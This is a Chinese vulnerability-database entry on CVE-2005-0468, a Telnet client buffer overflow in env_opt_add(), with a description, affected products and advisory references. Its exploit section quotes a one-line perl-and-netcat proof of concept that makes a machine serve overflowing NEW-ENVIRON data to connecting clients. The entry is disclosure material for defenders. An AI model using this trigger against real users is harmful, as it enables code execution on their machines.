Telnet客户端env_opt_add() 缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1108586 漏洞类型 缓冲区溢出
发布时间 2005-03-28 更新时间 2007-02-22
CVE编号 CVE-2005-0468 CNNVD-ID CNNVD-200505-503
漏洞平台 Linux CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/25303
https://www.securityfocus.com/bid/12919
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-503
|漏洞详情
TELNET协议是一种实现远程虚拟终端功能的网络协议,目前有多种telnet的服务器及客户端的实现。多个TELNET协议客户端的实现在处理telnetNEW-ENVIRON子协商选项时存在缓冲区溢出漏洞,如果用户使用有漏洞的客户端程序连接访问恶意telnet服务器,可能导致在客户端机器上执行恶意指令。
|漏洞EXP
source: http://www.securityfocus.com/bid/12919/info

Multiple vendors' Telnet client applications are reported prone to a remote buffer-overflow vulnerability. This vulnerability reportedly occurs in the 'env_opt_add()' function in the 'telnet.c' source file, which is apparently common source for all the affected vendors.

A remote attacker may exploit this vulnerability to execute arbitrary code on some of the affected platforms in the context of a user that is using the vulnerable Telnet client to connect to a malicious server. 

perl -e 'print "\377", "\372\42\3\377\377\3\3" x 43, "\377\360"' | nc -l 23
|受影响的产品
Ubuntu Ubuntu Linux 5.0 4 powerpc Ubuntu Ubuntu Linux 5.0 4 i386 Ubuntu Ubuntu Linux 5.0 4 amd64 Trustix Secure Linux 2.2 Trustix Secure Linux 2.1 Trustix Secure Enterprise
|参考资料

来源:US-CERT
名称:VU#341908
链接:http://www.kb.cert.org/vuls/id/341908
来源:REDHAT
名称:RHSA-2005:330
链接:http://www.redhat.com/support/errata/RHSA-2005-330.html
来源:REDHAT
名称:RHSA-2005:327
链接:http://www.redhat.com/support/errata/RHSA-2005-327.html
来源:DEBIAN
名称:DSA-703
链接:http://www.debian.org/security/2005/dsa-703
来源:web.mit.edu
链接:http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2005-001-telnet.txt
来源:SGI
名称:20050405-01-P
链接:ftp://patches.sgi.com/support/free/security/advisories/20050405-01-P
来源:UBUNTU
名称:USN-224-1
链接:http://www.ubuntulinux.org/usn/usn-224-1
来源:BID
名称:12919
链接:http://www.securityfocus.com/bid/12919
来源:IDEFENSE
名称:20050328MultipleTelnetClientenv_opt_add()BufferOverflowVulnerability
链接:http://www.idefense.com/application/poi/display?id=221&type=vulnerabilities
来源:DEBIAN
名称:DSA-731
链接:http://www.debian.de/security/2005/dsa-731
来源:SUNALERT
名称:57761
链接:http://sunsolve.sun.com/search/document.do?assetkey=1-26-57761-1
来源:SUNALERT
名称:57755
链接:http://sunsolve.sun.com/search/document.do